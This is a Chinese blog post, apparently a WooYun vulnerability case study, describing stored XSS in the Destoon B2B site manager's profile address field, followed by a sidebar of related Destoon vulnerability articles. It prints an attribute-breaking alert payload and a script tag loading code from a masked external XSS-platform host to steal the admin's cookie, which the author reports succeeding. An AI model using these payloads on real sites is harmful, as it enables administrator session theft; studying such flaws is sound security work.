【漏洞学习——XSS】Destoon B2B网站管理系统存储xss

最新推荐文章于 2023-09-12 16:27:08 发布
最新推荐文章于 2023-09-12 16:27:08 发布
阅读量1.1k 收藏
点赞数
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84378815
版权

漏洞简介

Destoon B2B网站管理系统存储xss,可打后台cookie

我们在修改资料的地方插入xss

查看源代码- - 发现没有做任何的过滤

<td class="tr">
  <input type="text" size="40" name="post[address]" id="daddress" value="\">
  <script>alert(/xss/)</script>"/> 
  <span id="ddaddress" class="f_red">
  </span></td>
</tr>

我们既闭合value值,又成功地插入了xss

后台成功触发

因此我们继续,插入盗取cookie的xss代码
/><script src=http://**.**.**.**/RyjbQz8></script>

我们登录到后台查看,我们的xss平台已经收到管理的cookie了哈哈

 

参见:https://bugs.shuimugan.com/bug/view?bug_no=145897

FLy_鹏程万里
关注
专栏目录
destoon注入漏洞
qq_34862577的博客
02-28 2878
漏洞名称:destoon注入漏洞漏洞等级: 高危披露时间:2017-03-22 08:59:13漏洞类型:Web-CMS漏洞漏洞描述:在php5.2下可以绕过waf,利用没有正确过滤的变量进行注入。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了该漏洞,云盾依然报告...
Destoon(B2B网站系统) 6.0 GBK 20171011.zip
05-24
Destoon(B2B网站系统)使用当前流行的PHP语言开发,以MySQL为数据库,采用B/S架构,MVC模式开发。融入了模型化、模板、缓存、AJAX、SEO等前沿技术。与同类产品相比,系统功能更加强大、使用更加简单、运行更加稳定、安全性更强,效率更高,用户体验更好。系统开源发布,便于二次开发、功能整合、个性修改。 Destoon 6.0 GBK 20171011 更新日志: [修复]手机版留言存在SQL注入漏洞;[修复]Kindeditor编辑器插入视频无法在手机版播放;[修复]分类设置了SEO信息没有优先显示;[修复]快钱支付接口无法支付成功;[修复]易宝支付错误信息未正确保存;[更新]常用支付接口申请地址;[更新]最新QQ视频匹配播放规则;[优化]Memcache服务无法连接时自动切换到文件缓存。
阿里云提示漏洞destoon变量覆盖导致延时注入
weixin_34060299的博客
08-18 293
出现漏洞 .../module/mall/my.inc.php .../backup/module/mall/my.inc.php 修复方法: my.inc.php里面所有的extract函数加上, EXTR_SKIP参数就可以 比如extract($item);修改成extract($item,EXTR_SKIP); ...
array_map php ord,Destoon最新全版本通杀SQL注入漏洞
weixin_33734087的博客
03-24 458
Author:Kavia/common.inc.php 64行:[php]if($_POST) $_POST = strip_sql($_POST);//strip_sql()过滤if($_GET) $_GET = strip_sql($_GET);if($_COOKIE) $_COOKIE = strip_sql($_COOKIE);.........if($_POST) extract($_P...
无意中发现destoon5商城处理订单时的一些bug
weixin_30776273的博客
08-29 105
最新的destoon5在商城的商品中加入了商品属性的功能,可以使用三个商品属性而在代码中用如“49-3-0-0”来标记所选择的的商品及属性,其中第一个数字是商品的id,后三个表示的是商品对应的属性值,而在处理订单时,我发现了一些问题:在生成订单后生成对应的商品评价数据时代码如下其中商品id直接对应$k,而从这个代码可以知道$k所对应的格式形如:49-3-0-0,而在商品评价数据表中插入时编程插...
DESTOON B2B网站管理系统 v7.0 bulid0517
10-12
DESTOON B2B网站管理系统 v7.0 build0517是一款专为构建电子商务行业门户设计的高效能、安全且灵活的平台。这款系统基于PHP编程语言和MySQL数据库,利用了流行的B/S(浏览器/服务器)架构,使得用户可以通过网页...
基于PHP的Destoon B2B php网站管理系统GBK.zip
07-18
Destoon B2B网站管理系统...通过以上介绍,我们可以看出Destoon B2B网站管理系统是一个全面的电子商务解决方案,提供了从基础架构到高级功能的全方位支持,对于希望搭建专业B2B平台的企业来说,是一个值得考虑的选择。
Destoon B2B网站管理系统PHP源码下载
资源摘要信息: "基于PHP的Destoon B2B php网站管理系统" Destoon B2B是一个基于PHP开发的电子商务网站管理系统,专注于为中小企业提供企业对企业(B2B)的电子商务平台解决方案。它提供了一个完整套件,包括网站...
DESTOON B2B网站
06-01
数据库方面,它采用MySQL,这是一种流行的关系型数据库管理系统,以其高效率、稳定性和易用性著称。结合PHP和MySQL,DESTOON可以提供高效且稳定的网站运行环境。 2. **网站源码特性** 作为一款网站源码,DESTOON...
Destoon PHP版B2B网站系统 v4.0_GBK
02-26
Destoon PHP版B2B网站系统是一款用于构建企业间电子商务平台的开源软件,其v4.0_GBK版本是专为处理中文字符集GBK编码设计的。这个系统旨在为企业提供一个功能全面、易于管理和定制化的在线交易平台,促进供应商与...
dedecms 留言本 XSS 漏洞
收集盒 Book box
09-09 740
dedecms 的 0day 又出来了 呵呵。其实只是xss,结合下社工还是可以拿shell的 plus/guestbook/index.php >>>>function init() { document.write(\'Hacked by qing\');}win
Destoon被植木马 @include(PACK('H*','2F746D702F2E4943452D756E69782F30'));
xingnang2008的专栏
06-25 1374
暂无法确定,植入路径! 网站收录页面被指向波菜,但用浏览器,打开时提示403。应该代码中加入了判断浏览器header的代码。 在站内搜索到两个php文件,有代码写入 @include(PACK('H*','2F746D702F2E4943452D756E69782F30')); 用16进制转字符串后 2F746D702F2E4943452D756E69782F30 => /tmp/....
开发b2b平台要注意这些漏洞
最新发布
taowowang的博客
09-12 60
CSRF漏洞B2B平台CSRF漏洞是指当B2B平台上的一个用户登录后,访问了一个带有恶意代码的第三方网站时,攻击者会利用该网站向平台发送一个伪造的请求,从而让用户的账户遭到攻击。攻击者可以在第三方网站上创建一个假的提交表单,利用用户的登录状态,伪造一个请求到B2B平台,从而模拟用户的行为,进行非法操作,例如以用户的身份进行购买、更改账户信息等操作,从而导致用户的经济损失。2.过滤输入数据:对于用户输入的数据进行过滤和验证,例如限制输入的字符类型,长度等,可以减少注入漏洞的风险。
destoon php文件,Destoon 任意文件读取
weixin_32024145的博客
03-18 211
发布时间:2016-08-29公开时间:N/A漏洞类型:变量覆盖危害等级:高漏洞编号:xianzhi-2016-08-42442070测试版本:N/A漏洞详情include/remote.class.phpfunction construct($file, $savepath, $savename = '') {global $DT, $_userid;$this->file = strip...
存储xss实例分享---基于web靶机的织梦内容管理系统
永不垂头的博客
08-08 468
存储xss实例分享—基于web靶机的织梦内容管理系统 存储xss实例分享: ① 用御剑扫到管理员登录路径: http://192.168.1.105:800/DedeCmsV5.6-GBK-Final/uploads/dede/login.php ② 打开如下: ③ 用xss平台(可以多试几个平台) https://xss8.cc/xss.php?do=project&act=viewcode&ty=create&id=10604 ④ 登录 会员账号/密码:like/12
DESTOON从CSRF到GETSHELL
dfdhxb995397的博客
09-25 271
本文作者:薄荷糖微微凉 Destoon B2B网站管理系统是一套完善的B2B(电子商务)行业门户解决方案。系统基于PHP+MySQL开发,采用B/S架构,模板与程序分离,源码开放。模型化的开发思路,可扩展或删除任何功能;创新的缓存技术与数据库设计,可负载不低于百万级别数据容量及访问。系统被数万b2b网站所采用,同时,也有数量巨大的开发者利用该系统进行二次开发。 0x 01受影响版本...
ThinkPHP V5.0.5漏洞_【权威发布】近日重点网络安全漏洞情况摘报
weixin_39669701的博客
10-29 272
网络安全大家好,小编近日将国内主流网络安全媒体发布的重要网络安全漏洞进行了梳理汇总,在这里分享给大家学习。让我们来共同提升网络安全防范意识吧。!01Xiaomi路由器存在输入验证错误高危漏洞Xiaomi router R3600是中国小米科技(Xiaomi)公司的一款无线路由器,该路由器存在输入验证错误高危漏洞,该漏洞源于set WAN6接口中的过滤器可以被绕过,导致远程代码执行,攻击者...
destoon 后台写入webshell
weixin_34104341的博客
11-21 729
2019独角兽企业重金招聘Python工程师标准>>> ...
Destoon后台权限-不给客户创始人权限并屏蔽部分功能
withoutfear的博客
03-02 371
1、根目录下后台入口文件admin.php $_founder = $CFG['founderid'] == $_userid ? $_userid : 0; // $CFG['founderid'] 是config.php里指定的网站创始人账户id配置项, $_founder 存储了创始人id, 如果不是创始人则$_founder为0; (1) inc.php文件里可以通过if($_founder) 判断是否是创始人。 (2) 后台模板 tpl.php 里可以通过<?php if($_fo..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值